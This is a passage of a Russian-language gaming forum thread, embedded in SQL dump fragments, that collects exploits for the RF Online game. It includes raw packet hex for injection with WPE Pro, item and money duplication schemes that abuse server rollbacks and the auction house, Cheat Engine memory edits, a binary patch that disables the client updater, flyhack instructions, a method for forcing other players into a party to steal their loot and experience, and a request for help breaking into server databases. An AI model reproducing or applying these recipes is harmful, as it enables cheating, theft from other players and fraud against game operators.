 buf:=buf +#$00 + copy(_gBuff,27,2) +#$01; 
 buf:=buf +#$00 + copy(_gBuff,29,2) +#$01; 
 buf:=buf +#$00 + copy(_gBuff,31,2) +#$01+#$08+#$00+#$0C+#$0A+#$AC+#$0B+#$60+#$0D; 
//+#$08+#$00+#$0C+#$0A+#$C8+#$22+#$C8+#$09
 gSys(\'EnSendS\',buf); // Продали значит..
Writelog(\'Продано...\');
end;
Включаем и уходим минут на 15... приходим - 150КК голд есть

Теоретически баг работает в любой G4EP2, где продается что-то дорогое, с чем можно выполнить вышеописанное условие

Регистрация предметов на ауке PVPWAR

не на всех серверах аук отключен. На некоторых просто стоит защита от регистрации предметов на аук.


Обходится таким образом.

Заходим в игру, бежим к ауку, встаем рядом, выходим из игры. Затем заного входим и регистрируем шмотки на аук. Проверил 10 минут назад на х5 - пашет.

RF WTF Final Release

Конечная версия 1, сделано только для Update 5
Спец версия для бесплатного использования.
Внимание! Неправильное использование программы влечёт за собой бан.




качаем и радуемся)

Дюп для руоффа, немного денег для кор/евро оффа и маленький совет для игроков

Дюп для руоффа действующий но выйдет не в любой момент а по обстоятельствам


Когда на сервере начинаются жёсткие лаги с откатом то можно дюпнуть вещи!

1. Заходим в 2-а окна
2. передаем оружие, бижу, шмот
3. Кому передали делаем логаут
4. а кем передавали остаемся в игре
5. Когда сервак упадет, получается что того, кем передавали откатит, а кому передали - у него сохранится!


Баг на деньги на ccr оффе

штак, при создании нового персонажа ему даются два ящика с оружием, один из которых открывается при взятии 40 уровня, и из него выпадает пониженное до 41-44 интовое оружие 45 уровня, второой можно открыть по достижению 45 и получить инт пуху 50 уровня , пониженную до 46-49

Но вот только не обязательно качаться до того самого 40, 45. Можно же и на первом их открывать

Поможет нам в этом Сheat Engine. штак запускаем его, ищем по имени этот самый ящик. Как минимум найдётся три адреса, т.к. ящики бывают на мили, дальнобойные и посохи

Вспоминаем, что в HEX 40=28, 45=2D и находим строчку похожую на FFFFF28 или FFFFFF2D. Заменяем 28 и 2D на 00.

Возвращаемся к игре и лёгким кликом кнопки мыши открываем ящики.

Видео:
[ YOUTUBE =«
глянуть[ /YOUTUBE]

ш наконец совет для тех. кто хочет узнать количество игроков онлайн и всего зарегистрированных на сервере


Что бы узнать сколько сейчас на сервере играет людей и сколько вообще персонажей создано нужно:
1) Создать перса(любого,любой расы)

2) Бафнуться любым бафом

2.1) 6 и 7й бафы это Sid перса именно он является показателем кол-ва онлайн игроков на сервере

2.2)8-11 байты это вашь ID, именно он является последним созданным чаром и следовательно кол-вом персов, созданных на сервере
[/hide]
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Небольшой баг для увеличения урона
Код:
Наш пакетик на атаку выглядит так
FF FF -означает что патронов не требует
2e - нумерация атаки, как бы мы это не трогаем
63 0f - это моб которого бьем, тоже не трогаем

Открываем впе про

Создаем фильтр, флаг на адванс

заполняем первую строку
Код:
0E 00 05 01 2E 00 00 00 FF FF 01 00 63 0F
-изначальный пакет

0E 00 05 01 __ 00 00 00 FF FF - вбиваем в верхнюю
0E 00 05 01 __ 00 00 00 2A 00 - в нижней строке

__ - пробел

2A - это ид слота ракеты, он меняется так что предварительно ищем ракеты

Баг делает руль для война, скажем 45 воин с оружкой на землю +2е невежи (кач на орках) мы скажем сделали так как написано выше и вставили ему ракеты на землю, теперь наш воин прикольно качается с 2ым демагом, по воздуху и у него адский ланчевый сплэш

Ракеты это как пример, на самом деле могут быть хоть грены на анти баф или сплэш патроны для пулемета

Ну а насчёт фарма в ставке я вобще промолчу

Подобную ерись можно провернуть и со скилами, и они тоже будут кочегарить стихией. Но вот сплэш будет далеко не у всех скиллов (война)


За предоставленную информацию благодарим Tolik\'a

Установка сервера Giga4 Episode 2 Final Update (Full ВЕРСшЯ)

Файлы были доработаны 3 людьми(NickXacker, _sharki_ и человеком пожелавшим остаться без внимания)
Нам понадобится
- Компьютер с минимумом (4 Гб) оперативной памяти и хорошей производительностью(Athlon X2 5200+ 64 bit).
- Microsoft Windows Server 2003 64bit/XP 64bit Поищите его в сети!!!
- Microsoft SQL server 2005 Поищите его в сети!!!
- Файл AppServ: appserv-win32-2.5.9.exe шнструкция по установке
- Файлы сервера игры: nick.7z
- Базы(Чистые базы + BillCruxRF-почищен и пофикшен) Bases6upFULL.7z
- Список ГМ команд: ГМ команды
- Hex редактор: UltraEdit-32.14.00-4
- Ваш IP сервера WAN (Wide Area Network) определить можно тут
- 7z архиватор под 64бит систему!!!: 7z458-x64.msi

Пароли от архивов и ост инструктаж можно получить в ICQ 42-900-500
(ш не дай бог кто-то передаст пароль, а я это буду узнавать по кол-ву скаченных раз и кол-ву людей постучавших в асе, и этот размер достигнет 10-15человек удалю архивы)

- Ваш IP сервера LAN (Local Area Network), если вы работаете в локальной сети.

- Если у вас есть router, все входящие порты вам необходимо перенаправить на ваш выделенный IP сервера.


Про ODBC повторюсь так как тут у все и почти всегда лажа получается)))

Подробный гад с новыми рисунками выложу сегодня завтра.',1,0,'85.175.145.211',0,1,0,0,0,0),
(26352,3468,26282,'NickXacker',1123,'',1231689939, 'Народ я так понимаю ВАМ не нужны файлы сервера??? Которые не достать не на емудеве не на другом форуме?

Жду постов ещё 1-2 дня и стираю сообщение полностью.

Две маленькие подсказки

1. Если флудить в /sell чате на макросе и свернуть игру, то деньги (1к) за сообщение сниматься не будут

2. На оффе белое оружие/броня точится безопасно на +4, тип-А на +3, инт на +2, стринт не имеет безопасной точки. Но если точить стринт только таликами без камней, то точа на +1 шанс того что оружие сломается полностью отсутствует :z:

Мявоводителям на pvp-war

штак, баг приятно экономит нам около 550 кк на грейд баллисты XR3. Работает на PvP-War, на других серверах не проверял. Покупаем ключик у поставщика, или используем уже имеющийся. НО нужно помнить в каком порядке вы покупали ключи. Это будет нужно для корректировки пакета.

Короче стоим около поставщика и отправляем этот пакет (без пробелов конечно же=)):

0800 1705 00 01 03 22

У вас со счета снимается около 1кк далантов, а вы становитесь счастливым обладателем тонарма XR3 (не верите - сделайте релог )

теперь по пакету:

00 - номер вашего ключика (это первый, 01 - второй, 02 - третий)
01 - постоянный
03 - номер закладки грейдов у поставщика (00 - голова, 01 - торс, 02 - ноги, 03 - рука1, 04 - рука2, 05 - опции)
22 - Тонарм XR3 (берется из item.edf)

22 00 00 00 00 35 11 80 d2 ee ed e0 f0 ec 20 58 52 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 04 01 00 0a 00 00 00 01 01 00 00 00 00 00 00 27 00 00 00 00 63 09 1b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff

Все остальное грейдицо за деньги, все проверял. В итоге мы имеем полный третий грейд баллисты примерно за 75кк

Добавлено через 2 минуты
Теперь про Голиафа. При грейде мао проходит 2 проверки - на платежеспособность и соответствие уровня. В прошлом посте был баг по цене грейда, теперь баг по уровню. На PvP - War есть возможность грейдануть голиафа на 55 ур не будучи 55ым (но денюшку заплатить все же придется =)). Можно это сделать двумя способами:

1 Пакетами.

08001705 01 010011 - голова титан
08001705 01 010111 - корпус титан
08001705 01 010211 - обтекатель титан
08001705 01 01040E - плечевой элемент XR2
08001705 01 01050E - тыльная броня XR2

Не забываем 01 - номер ключика по порядку его покупки.
К великому сожалению ручки по уру проверяются, но и из этого можно извлечь пользу. Не многие ломануца на 55 мявку хоть и с красными ручками. Главное не особо палицо на выполнении квестов, которые вроде бы уже давно должен был быть выполнен

2 способ - Правка item.edf

шщем нужную нам детальку и меняем 37 на нужный нам уровень (50 - это 32). А затем спокойно покупаем грейд у поставщика.
my.php

шоп с реликтами (пвп-вар)

На pvpwar (а может и еще где, на оффе у акров,белок нету) у неписа командующий есть скрытый шоп с реликтовым оружием парочкой портов и радаров. Открывается он просто - подходим к нему, смотрим иерархию, а затем отправляем пакет:

06000C110D00

- обычный пакет на покупку\\продажу , где 0D - id неписа.

Это у булок, у акров вроде 3D, а у кор сами гляните, нужно только тыкнуть на неписа и поймать пакет вида

0600180DA000.

Если не совершить какое-нить действие с данным неписом (пример посмотреть иерархию), то откроется окно последней покупки...хз че так....

А дальше если есть деньги, то покупаем так (деньги не снимутся), либо пакетами вида:

0C000C01 0D 0100 09 000000 01 - пакет покупки, где

0D - id неписа
09 - слот из которого покупаете (начинаются с 00)
01 - количество покупаемых вещей.

В пати без запроса + лут и опыт

Узнаем ID человека, которого хотим пригласить в пати. Для этого бафаем его, и ловим пакет на баф:
Код:
14 00 11 01 ?? 00 00 xx xx xx xx xx 00 AE 66 29 45 29 AA AA
xx xx xx xx xx - ид

При отправке пакета «0A 00 10 06 xx xx xx xx xx 00», в ваше пати вступает человек с данным ид... пускай он даже этого не хочет

Еще это способ воровать лут у того, кто передамажил пб... т.е. когда у пб остаеться меньше 5% хп, то можно принять этого человека в пати, и сменить подбор лута: лидер группы (пакет «05 00 10 1C [01]» 01 означает, что лут для пл)... после чего весь лут твой.

А еще можно придумать хороший способ пошланговать...
1. Кидаешь себе пати (отправляешь пакет «0A 00 10 06 xx xx xx xx xx 00», подминив ид на свой)
2. Меняешь лидера на себя самого (пакет «08 00 10 0F хх хх хх 00», где «хх хх хх» - это последние 3 байта в твоем ид)
3. Приглашаешь к себе в пати человека без пати
4. Делаешь его лидером
5. Покидаешь группу (можно пакетом 04 00 10 09)
После этих действий, за убивание моба тем человеком, которого ты приглашал, тебе будут давать опыт. Посли этого можно проделать все эти действия заново, но приглашать других людей, что даст и с них опыт)

Для понимания, почему это происходит, объясню... после того как ты пригласил себя и другого человека, пати состоит из:
-твоего шД
-твоего шД
-шД другого человека
и когда ты покидаешь группу, то твой второй шД остается в пати с тем человеком, и поэтому тебе будут давать за его убитых мобов опыт, как в группе

Стоит помнить, что опыт на дают, если тот человек убил моба на большом расстоянии от тебя, и что приглашенный человек может покинуть такую пати только релогом
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Меняем золото где хотим

Ограничения на расстояние от банкира нет, собственно сами пакеты:
Код:
08 00 0c 0a D4 07 00 00
- меняем дисену на 1 золотой.- первым чаром
Код:
08 00 0c 0a A8 0e 00 00
-меняем дисену на 1 золотой. -вторым чаром.
Код:
08 00 0c 0a A8 0f 00 00
-меняем дисену на 2 золотых. -вторым чаром.

Видно, что каждый раз пакет разный ну когда мы ловим начальный пакет на сумму 1 золотой то всегда можно поставить нужное число золота прибавив к 1 нужное нам чисто т.е 07+1 = 08, или как в примере 0e+1=0f

Но это просто наблюдения, а польза может быть от следующего пакета, например фармя на этере обычно выходит солидная сумма золотом на которую можно закупить 3к хелок для продолжения фарма и т.д., так вот этот пакет нам в этом случаем поможет.
Код:
08 00 0c 0b 01 00 00 00
- меняем 1 золотой на дисену.
01 00 00 00-число которое хотим поменять в данном случае 1 золотой (в 16 ричную систему переводим всё )

Пример:

Пакет на обмен 42 золота будет выглядеть так :
Код:
08 00 0c 0b 2a 00 00 00

Баг с Тп

На многих серверах (конечно фришки) есть на етере у координатора перемещений тп для разных рас, но если купить тп Корой за белок то Тп нельзя т.к раса не та

Покупаем тп в Hq (разумеется не в свою)

С помощью Се или Артмани ишем тп

Найдя ищем байт как на картинке и даный байт (тот который в чёрном квадратике) меняем на A0 -для всех рас

ш можно юзать тп в гш другой расе

В вк - без банок

Вулкан великолепная территория для соло прокачки персонажа не теряя банок из за того что вкуснейшая часть мобов находится в замкнутом пространстве или как гласит перевод на оффе « Пещеры Одиночества «.

Юзаем лоудер или любую другую прогу которая может поднимать и опускать персонажа по Y-координате.

Вылезаем уже наверно понятным способом наверх, бежим на место над мобом и спускаемся в низ но не шевелится. Акром можно сесть в осадку и начинать бить не опасаясь того что они сделают лишний шаг и «Упадут» к мобу который может их загрызть.

Это не секрет для разбирающихся в механизме перемещения перса - для остальных маленькая подсказка

Выключаем обновление

Чтобы выключить обновление клиента, т.е. чтобы не ждать время, а чтобы rf.exe сразу предлагал ввести пароль, без обновления, надо сделать это:

по адресу 00454DAF вместо jz ** забить два NOP\'a

(адрес 00454DAF, либо абсолютный в файле - 054DAF)

т.е. просто два байта 0x90

ш клиент сразу будет писать «обновление завершенно»

Довольно быстро нашелся этот jz

Оффсет дан для RF.exe от 180407 числа.
в новых версиях он будет другой

ps: только сохраните старый rf.exe, переименуйте его в rforg.exe и запускайте иногда, вдруг потребуются какие-то апдейты ...

Пользуемся складом у всех банкиров
шспользуем склад у всех банкиров, даже в городах другой расы

1. Запускаем WPE ловим пакет на открытие склада у банкира

пакет имеет вид :
Код:
[COLOR=DarkOrange]11 00[/COLOR] [COLOR=Green]22 03[/COLOR] [COLOR=Black]хх хх хх хх хх хх хх хх хх хх хх хх[/COLOR] 00
Длинна пакета
ID пакета
Ваш пароль

2. Сохраняем этот пакет не изменяя его

3. Подходим чаром к любому банкиру (в любой локации , можно в городах другой рассы)

4. Отправляем серверу сохраненный пакет и получаем доступ к хранилищу, работает и на rfonline.ru

фича с массовыми скилами

Вот нашёл интересную особенность у массовых скилов и магии(на остальных не работает)

Если поменять скиле один байт то в описании этого скила можно получить что кроме мобов и врагов его можно использовать НА КАРТЕ!
Тость ненадо ничего выделять, целиться, нажал на землю и радуйся)
Вот как это делается:


Добавлено через 6 минут
с этим багом очень удомно сканы брать)
не надо целиться по гвардам xd

Самый простой и удобный в использовании Flyhack

Нам понадобится:

Рабочая версия WTF (стянуть из первого поста):



Файл который лежит в папке WTF, который надо заменить чтоб прога работала:



Рабочая версия RFH:



WTF должна быть в папке с игрой.

Num Lock должен быть включен.

Теперь в проге RFH ставим спидхак на 0 (чтоб случайно невключился)

далее если неотдаляется зум нажать на первой вкладке RFH кнопочку SET.

В проге WTF поставить галочку на Fly hack:
jpg

Далее нажать в проге WTF кнопку на которой курсор (рисунок внизу)

Поставить галочку (у меня стоит офф серв(rfonline.ru)) и выбрать Rf Online.

если Rf Online нету нажать update, если всё выбрано нажать Select.



Всё это надо делать находясь в игре (в RFH написана инфа о моём персонаже).

А теперь сам гайд:

При включённом флайхаке персонаж перемещается по горизонтали независимо от текстур (но в стену войти неможет), другие персонажи видят его в нормальном состоянии.
В WTF валлхак непашет, для этого нам нужна была RFH , также в RFH есть зум.
Теперь подходим туда куда нам надо, включаем флай, и кнопками alt+num3 alt+num1 поднимаемся вверх.
Потом атакуем моба, и спускаемся (кнопками alt+num3 alt+num1) до уровня где мы можем его атаковать, но он нас небьёт.
Также это будет полезно на чв, чтоб гварды нетрогали)

С RFH играю уже полгода, вся рабочая, выложил версию которая у меня стоит

С помощью RFH во время кача/фарма можно редактировать высоту одним нажатием, в WTF валлхак битый( и зума нет.

Всё тестил только на оффе.

Всё пережевал и в рот положил=)

Кому помог тык спасипку!:wow:',1,0,'79.164.63.218',1,1,0,0,0,2),
(21040,2189,18692,'[[email protected]]',4121,'',1225317900,'+1:
если на вас надето оружие, которое по статам подходит лишь потому,что на вас другие шмотки,повышающие эти статы(инт, сила, вын и ловка), то при снятии этого шмота оружие останется у вас в руках. баг заключаетя в том что урон от него будет как в рукопашку а скорость удара повышается ппц как=))) прикольно смотрится как вы грином из хх месите моба 50го уровня минуту-две с ахренетькакой скоростью))

взлом бд сервера

как вы помните, раньше поднимался вопрос о взломе бд серверов рф...
но почему то про это забыли. Так вот может, кто разобрался в этом деле и может нам помочЪ?
например как для меня это было бы очень интересно, да и врятли кому то это бы не понравилось, ибо бд- это все!:wow:......',1,1,'93.183.192.157',0,1,0,0,0,0),
(20700,2792,20697,'roma!sk',31,'',1225045895,'юзай поиск, был гайд по «запрещенным никам»...',1,1,'93.183.192.157',0,1,0,0,0,0),
(20701,2792,20697,'Гексаэдр',2974,'',1225045964,'
10718500ge9.jpg

как такой ник написать чтобы в чате было постоянно прописывалось, с большим пробелом от звания.
при регистрация чара что нужно ввести?
42577573to4.jpg


какой сервер?
можно пакетами, можно ерез се и re отреддактировать звание и ник.',1,0,'85.142.199.47',0,1,0,0,0,0),
(20702,2792,20701,'roma!sk',31,'',1225046107,'вот те тема->

Фикс дюпа на just-rf..=)

штак, на этом чудо-сервере очень оригинально пофиксили дюп, описанный здесь.
-
Что же они сделали?
-
Они подняли потолок с 2ккк на б0льшее кол-во денег.
-
НО
-
подняли ооочень странно
-
Допустим, у тебя есть 2ккк. Ты продаешь пачку глю торговцу. Раньше было как? Она продавалась, но деньги не шли.
-
Теперь же, у тебя становится, допустим, 2.1ккк.
-
НО
-
После РЕЛОГА эти деньги пропадают.
-
ш когда ты продаешь вещь за 1 дизену то, соответственно, до ближайшего релога у тебя на руках ровно 2ккк и 1 дизена.
-
шТОГО
-
Нужно таким образом сделать себе ~2.5ккк. После этого попробовать что-либо купить на сумму >2kkk.
-
Если купицо - то все плохо, фикс на стороне сервера.
-
Если НЕТ - то это фикс в КЛшЕНТЕ! То есть остается найти файл и значение в нем, отвечающее за макс. кол-во денег в инвентори, и вернуть его на прежние 2ккк if:
-
Сегодня этим займусь, но, как говорится - одна голова хорошо, а две - лучше.
-
Так что пробуйте, думайте - фикс кривой даже на «глазок», поэтому нужно пробовать его обойти
update - рудокоп, насколько я понял, OG бот => сегодня попробую, дюпать через него +)

свежий овердамаг от нашего пользователя

Пользователь SauR с нами поделился вот этим:


1. берём программу cheatengine и включенный впе про(уже который должен записывать пакеты)

2. в рфки берём оружку котурую можем взять, смотрим какой мелкий и какой макс дамаг

3. ищем с помощью читэнжи значение от(мелкий дамаг) и до(дамаг макс)

4. в игрушке берём оружку с другим дамагом опять же запоминаем мелкия и большой

5. отсеиваем в чит энжи опять же от и до

6. действия 2-5 повторяем пока не останется значений 11(может быть и меньше(на этих значениях мы увидим в какой последовательности и какой дамаг будет(кстати тоже интересныая фишка))

7. куданить переписываем 4 байтные значения которые будут слева от значения дамага

8. переходим в впе про останавливаем запись

9. терь нам понадобиться фишка впе про по которой можно искать пакеты по 4 байтовому значению, где она не пишу так в разных версиях поразному

10. находим эти пакеты а дальше как вашей фантазии угодно хоть в впе про склеить их по 20 в одном хоть прогу написать которая по нажатию клавиши будет отправлять тут уж как вам угодно
[/HIDE]

Дюп кораблем
пример за кор
покупаем билет, подходим в самый левый угол перед кораблем.
жмем войти в корабль , и вас дс ит с откатом
только вас.
работает на всех ап5, кроме оффа-)

Дюп ауком

после фикса дюпа ауком , мы можем носить до 1 релога более 2ккк , т.е. провернув стандартную схему дюпа, после входа чара с 2ккк на руках , он получит деньги за купленный предмет во время его релога.
способ обхода найден.
сразу говорю , стоимость 1 дюпа = 1.2ккк , но если дюпать « умно « то он окупится , и еще не раз.

у вас на руках 2ккк , вы ставите на аукцион вещь ( допустим хп банки ) за 2ккк , еще 1 вещь за 1.2ккк ( это именно та вещь , что для дюпа ) и еще одну за 1 .
уходите в релог.

человек подходит к ауку и покупает в таком порядке.
сначала вещь в 2ккк ( при входе в игру , они к вам вернутся ) , затем вещь за 1.2ккк ( эта вещь которая дюпнется) - эти деньги пропадут , и наконец вещь за единичку.

войдя в игру у вас будет 4ккк на руках ( советую быстро отдать 2ккк другу, ибо если выкинет придется фармить ), а также вещь ( за 1.2ккк ).

ну а как помощь в соображении.....дюпаете тапки +6 на додж , и продаете по 4ккк...окупается в момент.
пока не нашел способа ставить 70 оружие и бронь на аук на пвп варе , но если вточить 65 +4 - +5 , можно быть довольным, ибо точится легче.

также как мне стало известно , стоимость фул сета перфект бижи(30-24) на пвп варе х100 , состовлояет 500-600 рублей , реал.

стоимость 1 ботинка +6 , равна 1к-1.5к рублей.
но с этим уже надо быть окуратнее. ибо админ не поощряет торговлю игровыми за реал.


вообщем , оч вас прошу, не уносите это дальше чем отсюда , как бы не хотелось.

Методы дюпа

1)Для этого надо 2 персонажа
1 персонаж ник его А должен иметь 2 ккк и поставить на Аукцыон то что хочет розмножить за 1 далант и зделать релог.
2 персонаж его ник В должен найти тот придмет который поставил персонаж А.
Например А поставил Копьё +7 за 1 далант а В нашёл то копьё
и персонаж А должен сделать релог во время которого В покупает копьё за 1 далант.
В итоге копе +7 есть и у А и у В.
Проверял на Sacred-Star, работает.

Добавлено через 43 секунды
и это, поставьте чего-нибудь типа хайда, а то на 2 серверах уже пофиксили(

увеличиваем скорость атаки на финал апе

Если было - попинать и выбросить
Благодарим за подробное описание Aktarsis

Сложность заключалась в неработе cheat engine,решили проблему RE 7.2 (есть на Форуме) -
2.Но ярфоб не пахал на фа и редактирование item.edf не приносило нужного результата,но и это решили,вроде такого здесь не было,а наработки я выложу.
(критика в нормальном количестве будет уместна,так как сделал 1 рабочий вариант над другими не думал,и выкладываю точную последовательность того,что я делал)

Начнем.
1.Качаем RE 7.2 из темы выше
2.Нам потребуется голова ланча 50 левела для примера.
3.Делаем поиск в RE по названию шлема с учетом регистра(Intense EW Head)
4.шщем строчку с примерно следующим содержанием

Код:
32 02 FF 36 FF 00 00 00 00 00 00 00 02 19 03 00 00 00 00 00 00 00 87 C3 00 00 20 41 00 00 00 00
5.Меняем 87 C3 00 на FF FF C5 (00 на С5 не захочет прописываться,делаем так кликаем 2 раза мышкой по нему и в строке значение пишем 197 и ОК,смотрим результат 00 сменилось на С5)
6.Смотрим в игре в описании шлема в графе скорость атаки будет вот такое 1.#R(если этого нет пробуйте еще с шага 4)
7.После этого я одевал 55 шлем значение в информации о персонаже в графе скорость атаки стало 0.00,это значит нам удалось и скорость атаки уже повысилась раза в 2-5)
8.Делаем поиск по имени персонажа.
9.Находим код содержащий Код:
A2 E9
под ними 2 меняющихся значения.Эти меняющиеся значения добавляем в адрес лист и замораживаем,затем щелкаем на = и меняем его на +.
10.Заходим в игру и радуемся спидатаке)))

[ЗЛО!]ДЮП БЕЗ ОТКАТА!

Ну вот, дорогие мои друзья.
-
Наконец-то найден дюп без падения сервера, который на данный момент пофикшен только на Новус-Гэлакси. Мало того, ЭТОТ ДЮП РАБОТАЕТ НА ФА! Да да да, на ПвПВаре в том числе! :wow:
-
Перейдем к описанию самого дюпа.
-
штак, нам понадобится два персонажа и предмет, который мы хотим дюпнуть. У первого перса ( далее - перс А ) должна быть 2ккк(РОВНО 2ккк!) в кармане и вещь, которую нужно дюпнуть. У второго перса( далее - перс Б) - немного денег, и всё.
1. Персонаж А, имея 2ккк в кармане, выставляет вещь на аукцион за 1 дизену ( далант, CP ). Налог с 1 дизены не берецо, и в карманах должно остаться ровно 2ккк.
2. Персонаж А уходит в релог.
3. Персонаж Б покупает эту вещь. Да-да-да, несмотря на 2ккк в карманах продавца, вещь купится! Всё как обычно, вещь остается в инвентаре.
4. Персонаж Б выходит из игры.
5. Персонаж А заходит в игру, и выставленная вещь у него ОСТАЕТСЯ В шНВЕНТАРЕ!
6. Персонаж Б заходит в игру, и так же видит эту вещь у себя в карманах.
-
Вот и всё, дорогие друзья! Я очень надеюсь, что вы понимаете цену данного дюпа и то, что из-за него может быть очень много ненужных ВАЙПОВ. ПОЭТОМУ ОГРОМНАЯ ПРОСЬБА - НЕ РАСПРОСТРАНЯТЬ шНФУ
-
Всем спасибо за внимание.
-
(Первоначальная идея взята с другого форума. Метод тестировался лично мной. Гайд доведен до ума и оформлен лично мной. Спасибо C11 за тестирование этого бага, а так же некоторые полезные сведения.)

дюп с аукцмоном вроде 5ый ап

вот начнём дюп для 5 аппа
запустить минипроксер и поставить айпи серва
идёшь к ауку кладёшь туда вещь точнее предмет
и ловишь пакет установки цены
затем отсылаешь пакет с ценой до тех пор пока она не станет равной 2ккк
заходишь во 2 акк и покупаешь вещь
он выдаст ошибку и выкинет обоих
и получится сразу 3 вещи
 
Последнее редактирование модератором:

ProMeTHeuS

Пользователь
Регистрация
16 Июл 2011
Сообщения
2,356
Лайки
30
Баллы
48
Серия ацких открытий!!

Дюп первый, без падения:
за белок играем магом, снимаем то что хотим дюпнуть, меняйм профу на диверсанта, смотрим инвентарь, вешь в одном слоте (должно быть написано якобы 2)
1 выкидываем напол поднимаем вауля!!

дюп второй:
крафтим патроны керамику, на 100 штук, после серв уходит в откат на 10 мин!!

баг:
заключается в том что можно регенить мау
ловим пакет починки, и можем спокойно чиниться в любом месте мира!!!

вот и всё на сегодня, дети мои))) тестим, оставляем коменты)
 
Последнее редактирование модератором:

akula009

Пользователь
Регистрация
25 Июл 2011
Сообщения
45
Лайки
0
Баллы
0
Ну тут половина повторно.
 
Сверху